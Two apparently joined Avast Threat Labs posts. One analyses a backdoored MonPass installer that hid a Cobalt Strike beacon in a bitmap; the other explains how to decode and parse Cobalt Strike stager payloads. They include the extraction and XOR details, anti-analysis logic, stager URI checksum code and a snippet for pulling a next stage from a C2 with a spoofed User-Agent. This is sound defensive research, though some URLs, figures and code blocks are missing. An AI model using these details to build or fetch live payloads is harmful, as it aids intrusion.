We have confirmed with MonPass that they have taken steps to address these issues and are now presenting our analysis.

Our analysis beginning in April 2021 indicates that a public web server hosted by MonPass was breached potentially eight separate times: we found eight different webshells and backdoors on this server. We also found that the MonPass client available for download from 8 February 2021 until 3 March 2021 was backdoored. 

This research provides analysis of relevant backdoored installers and other samples that we found occurring in the wild. During our investigation we also observed relevant research from NTT Ltd, so some technical details or IoCs may overlap.

All the samples are highly similar and share the same pdb path:

C:\Users\test\Desktop\fishmaster\x64\Release\fishmaster.pdb and the string: Bidenhappyhappyhappy.

Figure 1: Pdb path and specific string

Technical details

The malicious installer is an unsigned PE file. It starts by downloading the legitimate version of the installer from the MonPass official website. This legitimate version is dropped to the C:\Users\Public\ folder and executed under a new process. This guarantees that the installer behaves as expected, meaning that a regular user is unlikely to notice anything suspicious.

Additional similar installers were also found in the wild, with SHA256 hashes:  e2596f015378234d9308549f08bcdca8eadbf69e488355cddc9c2425f77b7535 and f21a9c69bfca6f0633ba1e669e5cf86bd8fc55b2529cd9b064ff9e2e129525e8.

Figure 2: This image is not as innocent as it may seem.

The attackers decided to use steganography to transfer shellcode to their victims. On execution, the malware downloads a bitmap image file from[.]ml:8880/download/37.bmp as shown in figure 2

The download is performed slightly unusually in two HTTP requests. The first request uses the HEAD method to retrieve the Content-Length, followed by a second GET request to actually download the image. After the picture is downloaded, the malware extracts the encrypted payload as follows. The hidden data is expected to be up to 0x76C bytes. Starting with the 3rd byte in image data it copies each 4th byte. The resulting data represents an ASCII string of hexadecimal characters which is later decoded into their respective binary values. These bytes are then XOR decrypted using the hardcoded key miat_mg, resulting in a Cobalt-Strike beacon.
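The extraction scheme described above can be sketched as follows. The toy embed_payload() helper and the buffer size in the example exist only so the round trip can be demonstrated without the real bitmap:

```python
from itertools import cycle

KEY = b"miat_mg"  # hardcoded XOR key from the sample

def xor_crypt(data, key=KEY):
    # XOR with a repeating key; applying it twice restores the input.
    return bytes(b ^ k for b, k in zip(data, cycle(key)))

def extract_payload(image_data, max_len=0x76C):
    # Starting with the 3rd byte, every 4th byte carries one ASCII hex character.
    hex_chars = image_data[2::4][:max_len]
    return xor_crypt(bytes.fromhex(hex_chars.decode("ascii")))

def embed_payload(pixels, payload):
    # Demo-only inverse of extract_payload(), used here for the round trip.
    for i, b in enumerate(xor_crypt(payload).hex().encode("ascii")):
        pixels[2 + 4 * i] = b
    return bytes(pixels)
```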

We have seen multiple versions of this backdoored installer, each with slightly modified decryptors. 

In version (f21a9c69bfca6f0633ba1e669e5cf86bd8fc55b2529cd9b064ff9e2e129525e8) the XOR decryption was stripped.

In the version (e2596f015378234d9308549f08bcdca8eadbf69e488355cddc9c2425f77b7535) basic anti-analysis tricks were stripped. In Figure 3, you can see different time stamps and the same rich headers.

Figure 3: Timestamps
Figure 4: Rich header.

In the backdoored installer we also observed some basic anti-analysis techniques used in an attempt to avoid detection. In particular, we observed checks for the number of processors using the GetSystemInfo function, the amount of physical memory using the GlobalMemoryStatusEx function and the disk capacity using the IOCTL_DISK_GET_DRIVE_GEOMETRY IOCTL call. If any of the obtained values are suspiciously low, the malware terminates immediately.
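The logic of those checks reduces to comparing a few environment values against minimum thresholds. The thresholds below are illustrative assumptions, since the exact limits used by the sample are not stated:

```python
def looks_like_analysis_vm(cpu_count, ram_bytes, disk_bytes):
    # Values this low are rare on real hardware but common in sandboxes.
    # All three thresholds are assumptions for illustration.
    return (
        cpu_count < 2
        or ram_bytes < 2 * 1024**3      # under 2 GB of RAM
        or disk_bytes < 60 * 1024**3    # under 60 GB of disk
    )
```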

Figure 5: Anti-analysis techniques employed by the malware

Figure 6: Anti-analysis technique testing for disk capacity

One of the samples (9834945A07CF20A0BE1D70A8F7C2AA8A90E625FA86E744E539B5FE3676EF14A9) used a different known technique to execute shellcode. First it is decoded from a list of UUIDs with UuidFromStringA API, then it is executed using EnumSystemLanguageGroupsA.
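The UUID decoding can be reproduced in a few lines: UuidFromStringA stores the first three UUID fields little-endian, which Python mirrors with UUID.bytes_le. A sketch, with a demo-only encoder for the round trip:

```python
import uuid

def uuids_to_shellcode(uuid_strings):
    # Each 36-character UUID string decodes back to 16 bytes of shellcode.
    return b"".join(uuid.UUID(s).bytes_le for s in uuid_strings)

def shellcode_to_uuids(shellcode):
    # Demo-only inverse; real samples ship the strings pre-generated.
    return [str(uuid.UUID(bytes_le=shellcode[i:i + 16]))
            for i in range(0, len(shellcode), 16)]
```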

Figure 7:Decoding list from UUIDs and executing shellcode.

After we found a backdoored installer at one of our customers, we commenced hunting for additional samples in VT and in our user base to determine if there were more backdoored installers in the wild. In VT we found some interesting hits:

Figure 8: VT hit

We analyzed the sample and found that it was very similar to the infected installers found at our customers. The sample contained anti-analysis techniques using the same XOR decryption and also contained similar C2 server addresses (hxxp:// as observed in previous backdoored installers. The sample also contained references to the link (hxxps://webplus-cn-hongkong-s-5faf81e0d937f14c9ddbe5a0.oss-cn-hongkong.aliyuncs[.]com/Silverlight_ins.exe) and the file path C:\users\public\Silverlight_ins.exe; however, these did not appear to be in use. The sample name is also unusual – Browser_plugin (8).exe – and we speculate that this may be a test sample uploaded by the actor.

In VT we saw another hash (4a43fa8a3305c2a17f6a383fb68f02515f589ba112c6e95f570ce421cc690910), again with the name Browser_plugin.exe. According to VT, this sample has been downloaded from hxxps:// and it downloaded the PDF file Aili.pdf from hxxp://

Figure 9: Content of Aili.pdf.

Afterwards it has similar functionality to the previously mentioned samples from VT, meaning it downloads and decrypts a Cobalt Strike beacon from hxxp://

In our database we found a similar sample again, this time named Browser_plugin (1).exe. This sample was downloaded from hxxp://; we saw it on Feb 4, 2021. It doesn't install any legitimate software, it just shows a MessageBox. It contains the C&C address (hxxp:// (note: there is a typo in the directory name: downloa).

Compromised Web server content

On the breached web server from which the backdoored installer could be downloaded, we found two executables: DNS.exe (456b69628caa3edf828f4ba987223812cbe5bbf91e6bbf167e21bef25de7c9d2) and again Browser_plugin.exe (5cebdb91c7fc3abac1248deea6ed6b87fde621d0d407923de7e1365ce13d6dbe).


It downloads a BAT file from the C&C server (hxxp://, which is saved as C:\users\public\DNS.bat. It contains this script:

Figure 10: DNS.bat script

The second part of the sample contains similar functionality and the same C&C server address as the backdoored installer we mentioned earlier.



This sample is very similar to this one (4a43fa8a3305c2a17f6a383fb68f02515f589ba112c6e95f570ce421cc690910) with the same address of C&C server, but it doesn’t download any additional document. 

C&C server analysis

We checked the malicious web server hxxps://, from which Browser_plugin.exe (4A43FA8A3305C2A17F6A383FB68F02515F589BA112C6E95F570CE421CC690910) had been downloaded. The malicious web server looks identical to the legitimate one; the difference is the certificate. The legitimate server's certificate is signed by Sectigo Limited, while the malicious server's is signed by Cloudflare, Inc.

Figure 11: Comparing two sites


This blog post outlines our findings regarding the MonPass client backdoored with Cobalt Strike. 

In our research we found additional variants on VirusTotal in addition to those we found on the compromised MonPass web server. 

In our analysis of the compromised client and variants, we’ve shown that the malware was using steganography to decrypt Cobalt Strike beacon. 

At this time, we're not able to attribute these attacks with an appropriate level of confidence. However, it's clear that the attackers intended to spread malware to users in Mongolia by compromising a trustworthy source, which in this case is a CA in Mongolia.

Most importantly, anyone that downloaded the MonPass client between 8 February 2021 and 3 March 2021 should take steps to look for and remove the client and the backdoor it installed.

I would like to thank Jan Rubín for helping me with this research.

Timeline of communication:

  • March 24. 2021 – Discovered backdoored installer
  • April 8. 2021 – Initial contact with Monpass through MN CERT/CC providing findings.
  • April 20. 2021 – MonPass shared a forensic image of an infected web server with Avast Threat Labs.
  • April 22. 2021 – Avast provided information about the incident and findings from the forensics image in a call with MonPass and MN CERT/CC.
  • May 3. 2021 – Avast followed up with MonPass in email. No response.
  • May 10. 2021 – Avast sent additional follow up email.
  • June 4, 2021 – MonPass replied asking for information already provided on April 22, 2021.
  • June 14. 2021 – Follow up from Avast to MonPass, no response
  • June 29, 2021 – Final email to MonPass indicating our plans to publish with a draft of the blog for feedback.
  • June 29, 2021 – Information from MonPass indicating they’ve resolved the issues and notified affected customers.
  • July 1, 2021 – Blog published.

Indicators of Compromise (IoC)

Timeline of compilation timestamps:

date & time (UTC) SHA256
Feb  3, 2021 07:17:14 28e050d086e7d055764213ab95104a0e7319732c041f947207229ec7dfcd72c8
Feb 26, 2021 07:16:23 f21a9c69bfca6f0633ba1e669e5cf86bd8fc55b2529cd9b064ff9e2e129525e8
Mar  1, 2021 07:56:04 e2596f015378234d9308549f08bcdca8eadbf69e488355cddc9c2425f77b7535
Mar  4, 2021 02:22:53 456b69628caa3edf828f4ba987223812cbe5bbf91e6bbf167e21bef25de7c9d2
Mar 12, 2021 06:25:25 a7e9e2bec3ad283a9a0b130034e822c8b6dfd26dda855f883a3a4ff785514f97
Mar 16, 2021 02:25:40 5cebdb91c7fc3abac1248deea6ed6b87fde621d0d407923de7e1365ce13d6dbe
Mar 18, 2021 06:43:24 379d5eef082825d71f199ab8b9b6107c764b7d77cf04c2af1adee67b356b5c7a
Mar 26, 2021 08:17:29 9834945a07cf20a0be1d70a8f7c2aa8a90e625fa86e744e539b5fe3676ef14a9
Apr 6, 2021 03:11:40 4a43fa8a3305c2a17f6a383fb68f02515f589ba112c6e95f570ce421cc690910

The post Backdoored Client from Mongolian CA MonPass appeared first on Avast Threat Labs.

Decoding Cobalt Strike: Understanding Payloads


Cobalt Strike threat emulation software is the de facto standard closed-source/paid tool used by infosec teams in many governments, organizations and companies. It is also very popular in many cybercrime groups which usually abuse cracked or leaked versions of Cobalt Strike. 

Cobalt Strike has multiple unique features and secure communication, and it is fully modular and customizable, so proper detection and attribution can be problematic. This is the main reason why we have seen Cobalt Strike used in almost every major cyber security incident or big breach over the past several years.

There are many great articles about reverse engineering Cobalt Strike software, especially beacon modules as the most important part of the whole chain. Other modules and payloads are very often overlooked, but these parts also contain valuable information for malware researchers and forensic analysts or investigators.

The first part of this series is dedicated to proper identification of all raw payload types and how to decode and parse them. We also share our useful parsers, scripts and Yara rules based on these findings back to the community.

Raw payloads

Cobalt Strike's payloads are based on Meterpreter shellcodes and share many traits, such as API hashing (x86 and x64 versions) or the checksum8 algorithm used for URL queries in HTTP/HTTPS payloads, which makes identification harder. This particular checksum8 algorithm is also used in other frameworks like Empire.

Let’s describe interesting parts of each payload separately.

Payload header x86 variant

Default 32-bit raw payloads' entry points start with the typical instruction CLD (0xFC), followed by a CALL instruction and PUSHA (0x60) as the first instruction of the API hash algorithm.

x86 payload
Payload header x64 variant

Standard 64-bit variants also start with the CLD instruction, followed by AND RSP,-10h and a CALL instruction.

x64 payload

We can use these patterns to locate payloads' entry points and compute the other fixed offsets from this position.

Default API hashes

Raw payloads have a predefined structure and binary format with particular placeholders for each customizable value such as DNS queries, HTTP headers or C2 IP address. Placeholder offsets are on fixed positions the same as hard coded API hash values. The hash algorithm is ROR13 and the final hash is calculated from the API function name and DLL name. The whole algorithm is nicely commented inside assembly code on the Metasploit repository.

Python implementation of API hashing algorithm
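The scheme is the standard Metasploit ROR13 routine: the uppercased, null-terminated UTF-16LE module name and the null-terminated ASCII function name are hashed separately and the two dwords are summed. A minimal implementation:

```python
def ror32(value, count=13):
    # 32-bit rotate right.
    return ((value >> count) | (value << (32 - count))) & 0xFFFFFFFF

def ror13_hash(data):
    h = 0
    for b in data:
        h = (ror32(h) + b) & 0xFFFFFFFF
    return h

def api_hash(dll, func):
    # Module name: uppercase UTF-16LE including the null terminator.
    # Function name: plain ASCII including its null terminator.
    dll_hash = ror13_hash((dll.upper() + "\x00").encode("utf-16-le"))
    func_hash = ror13_hash(func.encode("ascii") + b"\x00")
    return (dll_hash + func_hash) & 0xFFFFFFFF
```

The results match the hash table below, e.g. api_hash("kernel32.dll", "LoadLibraryA") yields 0x0726774C.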

We can use the following regex patterns for searching hardcoded API hashes:
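Since the hashes are embedded as little-endian dword immediates, a byte-level pattern search is enough. A sketch of the idea, with an abbreviated hash list:

```python
import re
import struct

KNOWN_HASHES = {
    0x0726774C: "kernel32.dll_LoadLibraryA",
    0x56A2B5F0: "kernel32.dll_ExitProcess",
    0xE553A458: "kernel32.dll_VirtualAlloc",
}  # abbreviated; the complete list appears below

# Each hash becomes a 4-byte little-endian pattern, as it appears in the code.
PATTERN = re.compile(b"|".join(re.escape(struct.pack("<I", h)) for h in KNOWN_HASHES))

def find_api_hashes(blob):
    return [(m.start(), KNOWN_HASHES[struct.unpack("<I", m.group())[0]])
            for m in PATTERN.finditer(blob)]
```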

We can use a known API hashes list for proper payload type identification and known fixed positions of API hashes for more accurate detection via Yara rules.

Payload identification via known API hashes

Complete Cobalt Strike API hash list:

API hash DLL and API name
0xc99cc96a dnsapi.dll_DnsQuery_A
0x528796c6 kernel32.dll_CloseHandle
0xe27d6f28 kernel32.dll_ConnectNamedPipe
0xd4df7045 kernel32.dll_CreateNamedPipeA
0xfcddfac0 kernel32.dll_DisconnectNamedPipe
0x56a2b5f0 kernel32.dll_ExitProcess
0x5de2c5aa kernel32.dll_GetLastError
0x0726774c kernel32.dll_LoadLibraryA
0xcc8e00f4 kernel32.dll_lstrlenA
0xe035f044 kernel32.dll_Sleep
0xbb5f9ead kernel32.dll_ReadFile
0xe553a458 kernel32.dll_VirtualAlloc
0x315e2145 user32.dll_GetDesktopWindow
0x3b2e55eb wininet.dll_HttpOpenRequestA
0x7b18062d wininet.dll_HttpSendRequestA
0xc69f8957 wininet.dll_InternetConnectA
0x0be057b7 wininet.dll_InternetErrorDlg
0xa779563a wininet.dll_InternetOpenA
0xe2899612 wininet.dll_InternetReadFile
0x869e4675 wininet.dll_InternetSetOptionA
0xe13bec74 ws2_32.dll_accept
0x6737dbc2 ws2_32.dll_bind
0x614d6e75 ws2_32.dll_closesocket
0x6174a599 ws2_32.dll_connect
0xff38e9b7 ws2_32.dll_listen
0x5fc8d902 ws2_32.dll_recv
0xe0df0fea ws2_32.dll_WSASocketA
0x006b8029 ws2_32.dll_WSAStartup

Complete API hash list for Windows 10 system DLLs is available here.

Customer ID / Watermark

Based on information provided on the official web pages, the Customer ID is a 4-byte number associated with the Cobalt Strike licence key and, since v3.9, is embedded into the payloads and beacon configs. This number is located at the end of the payload, if it is present. The Customer ID could be used to identify specific threat actors or for attribution, but many Customer IDs come from cracked or leaked versions, so please take this into account when using them for possible attribution.

DNS stager x86

The typical payload size is 515 bytes, or 519 bytes with the Customer ID value included. The DNS query name string starts at offset 0x0140 (calculated from the payload entry point), is null-terminated and has a maximum size of 63 bytes. If the DNS query name string is shorter, it is terminated with a null byte and the rest of the string space is filled with junk bytes.

DnsQuery_A API function is called with two default parameters:

Parameter Value Constant
DNS Record Type (wType) 0x0010 DNS_TYPE_TEXT
DNS Query Options (Options) 0x0248 DNS_QUERY_BYPASS_CACHE

Anything other than the default values are suspicious and could indicate custom payload.

Python parsing:
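A minimal sketch based on the offsets above:

```python
def parse_dns_stager(payload, entry=0):
    # DNS query name: offset 0x0140 from the entry point, max 63 bytes,
    # null-terminated, with junk padding after the terminator.
    raw = payload[entry + 0x0140 : entry + 0x0140 + 63]
    return raw.split(b"\x00", 1)[0].decode("ascii", errors="replace")
```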

Default DNS payload API hashes:

Offset Hash value API name
0x00a3 0xe553a458 kernel32.dll_VirtualAlloc
0x00bd 0x0726774c kernel32.dll_LoadLibraryA
0x012f 0xc99cc96a dnsapi.dll_DnsQuery_A
0x0198 0x56a2b5f0 kernel32.dll_ExitProcess
0x01a4 0xe035f044 kernel32.dll_Sleep
0x01e4 0xcc8e00f4 kernel32.dll_lstrlenA

Yara rule for DNS stagers:

SMB stager x86

The default payload size is 346 bytes plus the length of the pipe name string terminated by a null byte and the length of the Customer ID if present. The pipe name string is located right after the payload code on offset 0x015A in plaintext format.

CreateNamedPipeA API function is called with 3 default parameters:

Parameter Value Constant
Open Mode (dwOpenMode) 0x0003 PIPE_ACCESS_DUPLEX
Max Instances (nMaxInstances) 0x0001

Python parsing:
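A minimal sketch based on the offsets above:

```python
def parse_smb_stager(payload, entry=0):
    # Pipe name: plaintext, null-terminated, right after the payload code
    # at offset 0x015A.
    start = entry + 0x015A
    end = payload.index(b"\x00", start)
    return payload[start:end].decode("ascii", errors="replace")
```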

Default SMB payload API hashes:

Offset Hash value API name
0x00a1 0xe553a458 kernel32.dll_VirtualAlloc
0x00c4 0xd4df7045 kernel32.dll_CreateNamedPipeA
0x00d2 0xe27d6f28 kernel32.dll_ConnectNamedPipe
0x00f8 0xbb5f9ead kernel32.dll_ReadFile
0x010d 0xbb5f9ead kernel32.dll_ReadFile
0x0131 0xfcddfac0 kernel32.dll_DisconnectNamedPipe
0x0139 0x528796c6 kernel32.dll_CloseHandle
0x014b 0x56a2b5f0 kernel32.dll_ExitProcess

Yara rule for SMB stagers:

TCP Bind stager x86

The payload size is 332 bytes plus the length of the Customer ID if present. Parameters for the bind API function are stored inside the SOCKADDR_IN structure, hardcoded as two dword PUSHes. The first PUSH, with the sin_addr value, is located at offset 0x00C4. The second PUSH contains the sin_port and sin_family values and is located at offset 0x00C9. The default sin_family value is AF_INET (0x02).

Python parsing:
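A sketch of the parsing described above; the +1 offsets past the 0x68 PUSH opcode bytes are my reading of the instruction encoding:

```python
import ipaddress

def parse_tcp_bind_x86(payload, entry=0):
    # First PUSH imm32 at 0x00C4: the 4 sin_addr bytes follow the 0x68 opcode.
    ip = str(ipaddress.IPv4Address(bytes(payload[entry + 0xC5 : entry + 0xC9])))
    # Second PUSH imm32 at 0x00C9: low word sin_family, high word sin_port
    # (sin_port is in network byte order).
    imm = payload[entry + 0xCA : entry + 0xCE]
    family = imm[0] | (imm[1] << 8)
    port = (imm[2] << 8) | imm[3]
    return ip, port, family
```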

Default TCP Bind x86 payload API hashes:

Offset Hash value API name
0x009c 0x0726774c kernel32.dll_LoadLibraryA
0x00ac 0x006b8029 ws2_32.dll_WSAStartup
0x00bb 0xe0df0fea ws2_32.dll_WSASocketA
0x00d5 0x6737dbc2 ws2_32.dll_bind
0x00de 0xff38e9b7 ws2_32.dll_listen
0x00e8 0xe13bec74 ws2_32.dll_accept
0x00f1 0x614d6e75 ws2_32.dll_closesocket
0x00fa 0x56a2b5f0 kernel32.dll_ExitProcess
0x0107 0x5fc8d902 ws2_32.dll_recv
0x011a 0xe553a458 kernel32.dll_VirtualAlloc
0x0128 0x5fc8d902 ws2_32.dll_recv
0x013d 0x614d6e75 ws2_32.dll_closesocket

Yara rule for TCP Bind x86 stagers:

TCP Bind stager x64

The payload size is 510 bytes plus the length of the Customer ID if present. The whole SOCKADDR_IN structure is hardcoded as a qword inside a MOV instruction. The offset of the MOV instruction is 0x00EC.

Python parsing:
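An equivalent sketch for the x64 layout; the 2-byte instruction prefix before the immediate is my assumption about the MOV r64, imm64 encoding:

```python
import ipaddress

def parse_tcp_bind_x64(payload, entry=0):
    # MOV r64, imm64 at 0x00EC: REX prefix + opcode, then the 8-byte
    # SOCKADDR_IN (sin_family, sin_port in network order, IPv4 address).
    q = payload[entry + 0xEE : entry + 0xF6]
    family = q[0] | (q[1] << 8)
    port = (q[2] << 8) | q[3]
    ip = str(ipaddress.IPv4Address(bytes(q[4:8])))
    return ip, port, family
```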

Default TCP Bind x64 payload API hashes:

Offset Hash value API name
0x0100 0x0726774c kernel32.dll_LoadLibraryA
0x0111 0x006b8029 ws2_32.dll_WSAStartup
0x012d 0xe0df0fea ws2_32.dll_WSASocketA
0x0142 0x6737dbc2 ws2_32.dll_bind
0x0150 0xff38e9b7 ws2_32.dll_listen
0x0161 0xe13bec74 ws2_32.dll_accept
0x016f 0x614d6e75 ws2_32.dll_closesocket
0x0198 0x5fc8d902 ws2_32.dll_recv
0x01b8 0xe553a458 kernel32.dll_VirtualAlloc
0x01d2 0x5fc8d902 ws2_32.dll_recv
0x01ee 0x614d6e75 ws2_32.dll_closesocket

Yara rule for TCP Bind x64 stagers:

TCP Reverse stager x86

The payload size is 290 bytes plus the length of the Customer ID if present. This payload is very similar to TCP Bind x86: the SOCKADDR_IN structure is hardcoded at the same offset with the same double PUSH instructions, so we can reuse the Python parsing code from the TCP Bind x86 payload.

Default TCP Reverse x86 payload API hashes:

Offset Hash value API name
0x009c 0x0726774c kernel32.dll_LoadLibraryA
0x00ac 0x006b8029 ws2_32.dll_WSAStartup
0x00bb 0xe0df0fea ws2_32.dll_WSASocketA
0x00d5 0x6174a599 ws2_32.dll_connect
0x00e5 0x56a2b5f0 kernel32.dll_ExitProcess
0x00f2 0x5fc8d902 ws2_32.dll_recv
0x0105 0xe553a458 kernel32.dll_VirtualAlloc
0x0113 0x5fc8d902 ws2_32.dll_recv

Yara rule for TCP Reverse x86 stagers:

TCP Reverse stager x64

The default payload size is 465 bytes plus the length of the Customer ID if present. The payload has the SOCKADDR_IN structure at the same position as the TCP Bind x64 payload, so we can reuse the parsing code again.

Default TCP Reverse x64 payload API hashes:

Offset Hash value API name
0x0100 0x0726774c kernel32.dll_LoadLibraryA
0x0111 0x006b8029 ws2_32.dll_WSAStartup
0x012d 0xe0df0fea ws2_32.dll_WSASocketA
0x0142 0x6174a599 ws2_32.dll_connect
0x016b 0x5fc8d902 ws2_32.dll_recv
0x018b 0xe553a458 kernel32.dll_VirtualAlloc
0x01a5 0x5fc8d902 ws2_32.dll_recv
0x01c1 0x614d6e75 ws2_32.dll_closesocket

Yara rule for TCP Reverse x64 stagers:

HTTP stagers x86 and x64

The default x86 payload size is 780 bytes and the x64 version is 874 bytes long, plus the size of the request address string and the size of the Customer ID if present. The payloads include full request information stored inside multiple placeholders.

Request address

The request address is a plaintext string terminated by null byte located right after the last payload instruction without any padding. The offset for the x86 version is 0x030C and 0x036A for the x64 payload version. Typical format is IPv4.

Request port

For the x86 version, the request port value is hardcoded inside a PUSH instruction as a dword. The offset of the PUSH instruction is 0x00BE. The port value for the x64 version is stored inside a MOV r8d, dword instruction at offset 0x010D.

Request query

The placeholder for the request query has a max size of 80 bytes and the value is a plaintext string terminated by a null byte. If the request query string is shorter, then the rest of the string space is filled with junk bytes. The placeholder offset for the x86 version is 0x0143 and 0x0186 for the x64 version.

Cobalt Strike and other tools such as Metasploit use a trivial checksum8 algorithm for the request query to distinguish between x86 and x64 payload or beacon. 

According to the leaked Java web server source code, Cobalt Strike uses only two checksum values: 0x5C (92) for x86 payloads and 0x5D (93) for x64 versions. There are also implementations of Strict stager variants where the request query string must be 5 characters long (including the slash). The request query checksum feature isn't mandatory.

Python implementation of checksum8 algorithm:
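The checksum is simply the byte sum of the query string modulo 256, computed without the leading slash:

```python
def checksum8(uri):
    # Sum of the characters' ASCII values mod 256; the leading "/" is
    # stripped before summing.
    return sum(uri.lstrip("/").encode("ascii")) % 0x100

def is_x86_stager_uri(uri):
    return checksum8(uri) == 92   # 0x5C

def is_x64_stager_uri(uri):
    return checksum8(uri) == 93   # 0x5D
```

For example, "/WWWW" is a valid strict x86 stager query: ord("W") * 4 = 348, and 348 % 256 = 92.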

Metasploit server uses similar values:

You can find a complete list of Cobalt Strike’s x86 and x64 strict request queries here.

Request header

The size of the request header placeholder is 304 bytes and the value is also represented as a plaintext string terminated by a null byte. The request header placeholder is located immediately after the Request query placeholder. The offset for the x86 version is 0x0193 and 0x01D6 for the x64 version.

The typical request header value for HTTP/HTTPS stagers is User-Agent. The Cobalt Strike web server bans user-agents which start with lynx, curl or wget and returns response code 404 if any of these strings are found.

API function HttpOpenRequestA is called with following dwFlags (0x84600200):

Python parsing:
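A sketch covering the HTTP x86 placeholders listed above (the HTTPS variant differs only in offsets); the +1 offset past the PUSH opcode is my reading of the encoding, and the little-endian dword port is an assumption based on how InternetConnectA takes its port argument:

```python
def read_cstring(payload, offset, max_len=None):
    # Read a null-terminated string, optionally bounded by the placeholder size.
    end = payload.index(b"\x00", offset)
    if max_len is not None:
        end = min(end, offset + max_len)
    return payload[offset:end].decode("latin-1")

def parse_http_x86(payload, entry=0):
    port = int.from_bytes(payload[entry + 0xBF : entry + 0xC3], "little")
    query = read_cstring(payload, entry + 0x0143, 80)     # request query
    header = read_cstring(payload, entry + 0x0193, 304)   # request header
    address = read_cstring(payload, entry + 0x030C)       # request address
    return address, port, query, header
```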

Default HTTP x86 payload API hashes:

Offset Hash value API name
0x009c 0x0726774c kernel32.dll_LoadLibraryA
0x00aa 0xa779563a wininet.dll_InternetOpenA
0x00c6 0xc69f8957 wininet.dll_InternetConnectA
0x00de 0x3b2e55eb wininet.dll_HttpOpenRequestA
0x00f2 0x7b18062d wininet.dll_HttpSendRequestA
0x010b 0x5de2c5aa kernel32.dll_GetLastError
0x0114 0x315e2145 user32.dll_GetDesktopWindow
0x0123 0x0be057b7 wininet.dll_InternetErrorDlg
0x02c4 0x56a2b5f0 kernel32.dll_ExitProcess
0x02d8 0xe553a458 kernel32.dll_VirtualAlloc
0x02f3 0xe2899612 wininet.dll_InternetReadFile

Default HTTP x64 payload API hashes:

Offset Hash value API name
0x00e9 0x0726774c kernel32.dll_LoadLibraryA
0x0101 0xa779563a wininet.dll_InternetOpenA
0x0120 0xc69f8957 wininet.dll_InternetConnectA
0x013f 0x3b2e55eb wininet.dll_HttpOpenRequestA
0x0163 0x7b18062d wininet.dll_HttpSendRequestA
0x0308 0x56a2b5f0 kernel32.dll_ExitProcess
0x0324 0xe553a458 kernel32.dll_VirtualAlloc
0x0342 0xe2899612 wininet.dll_InternetReadFile

Yara rules for HTTP x86 and x64 stagers:

HTTPS stagers x86 and x64

The payload structure and placeholders are almost the same as the HTTP stagers. The differences are only in payload sizes, placeholder offsets, usage of InternetSetOptionA API function (API hash 0x869e4675) and different dwFlags for calling the HttpOpenRequestA API function.

The default x86 payload size is 817 bytes and the default x64 version is 909 bytes long, plus the size of the request address string and the size of the Customer ID if present.

Request address

The placeholder offset for the x86 version is 0x0331 and 0x038D for the x64 payload version. The typical format is IPv4.

Request port

The hardcoded request port format is the same as for HTTP. The PUSH offset for the x86 version is 0x00C3 and the MOV instruction for the x64 version is at offset 0x0110.

Request query

The placeholder for the request query has the same format and length as the HTTP version. The placeholder offset for the x86 version is 0x0168 and 0x01A9 for the x64 version.

Request header

The request header placeholder has the same size and format as in the HTTP version. The offset for the x86 version is 0x01B8 and 0x01F9 for the x64 version.

The HttpOpenRequestA API function is called with the following dwFlags (0x84A03200):

The InternetSetOptionA API function is called with the following parameters:

Python parsing:

Default HTTPS x86 payload API hashes:

Offset Hash value API name
0x009c 0x0726774c kernel32.dll_LoadLibraryA
0x00af 0xa779563a wininet.dll_InternetOpenA
0x00cb 0xc69f8957 wininet.dll_InternetConnectA
0x00e7 0x3b2e55eb wininet.dll_HttpOpenRequestA
0x0100 0x869e4675 wininet.dll_InternetSetOptionA
0x0110 0x7b18062d wininet.dll_HttpSendRequestA
0x0129 0x5de2c5aa kernel32.dll_GetLastError
0x0132 0x315e2145 user32.dll_GetDesktopWindow
0x0141 0x0be057b7 wininet.dll_InternetErrorDlg
0x02e9 0x56a2b5f0 kernel32.dll_ExitProcess
0x02fd 0xe553a458 kernel32.dll_VirtualAlloc
0x0318 0xe2899612 wininet.dll_InternetReadFile

Default HTTPS x64 payload API hashes:

Offset Hash value API name
0x00e9 0x0726774c kernel32.dll_LoadLibraryA
0x0101 0xa779563a wininet.dll_InternetOpenA
0x0123 0xc69f8957 wininet.dll_InternetConnectA
0x0142 0x3b2e55eb wininet.dll_HttpOpenRequestA
0x016c 0x869e4675 wininet.dll_InternetSetOptionA
0x0186 0x7b18062d wininet.dll_HttpSendRequestA
0x032b 0x56a2b5f0 kernel32.dll_ExitProcess
0x0347 0xe553a458 kernel32.dll_VirtualAlloc
0x0365 0xe2899612 wininet.dll_InternetReadFile

Yara rule for HTTPS x86 and x64 stagers:

The next stage or beacon can easily be downloaded with curl or wget:
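Keep in mind that the web server 404s the default lynx/curl/wget user-agents (see the request header section above), so a browser-like User-Agent has to be passed explicitly, e.g. curl -A "Mozilla/5.0 ..." <url>. The same request sketched with Python's stdlib (the URL here is a placeholder, not a real C2 address):

```python
import urllib.request

# Hypothetical stager URL: substitute the real request address, port and query.
url = "http://192.0.2.1:8080/ABCDEFGH"
req = urllib.request.Request(
    url,
    headers={"User-Agent": "Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko"},
)
# stage = urllib.request.urlopen(req).read()  # left commented out: live network access
```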

You can find our parser for Raw Payloads and all corresponding Yara rules in our IoC repository.

Raw Payloads encoding

Cobalt Strike also includes a payload generator for exporting raw stagers and payloads in multiple encoded formats. The encoded formats support UTF-8 and UTF-16LE.

Table of the most common encodings with usage and examples:

Encoding Usage Example
Hex VBS, HTA 4d5a9000..
Hex Array PS1 0x4d, 0x5a, 0x90, 0x00..
Hex Veil PY \x4d\x5a\x90\x00..
Decimal Array VBA -4,-24,-119,0..
Char Array VBS, HTA Chr(-4)&"H"&Chr(-125)..
Base64 PS1 38uqIyMjQ6..
gzip / deflate compression PS1
Xor PS1, Raw payloads, Beacons
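For reference, the simpler text encodings from the table can be reproduced in a few lines (a sketch; the Decimal and Char arrays use signed bytes, which explains the negative values, and the sample inputs are the 4d 5a 90 00 and fc e8 89 00 sequences from the examples column):

```python
def to_hex(data: bytes) -> str:            # VBS / HTA
    return data.hex()

def to_hex_array(data: bytes) -> str:      # PS1
    return ", ".join(f"0x{b:02x}" for b in data)

def to_hex_veil(data: bytes) -> str:       # PY
    return "".join(f"\\x{b:02x}" for b in data)

def to_decimal_array(data: bytes) -> str:  # VBA, signed bytes
    return ",".join(str(b - 256 if b > 127 else b) for b in data)

print(to_hex(bytes.fromhex("4d5a9000")))            # 4d5a9000
print(to_decimal_array(bytes.fromhex("fce88900")))  # -4,-24,-119,0
```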

Decoding most of the formats is pretty straightforward, but there are a few things to consider. 

  • Values inside Decimal and Char Arrays are split by "new lines" represented by "\s_\n" (\x20\x5F\x0A). 
  • Common compression algorithms used inside PowerShell scripts are GzipStream and raw DeflateStream.

Python decompress implementation:
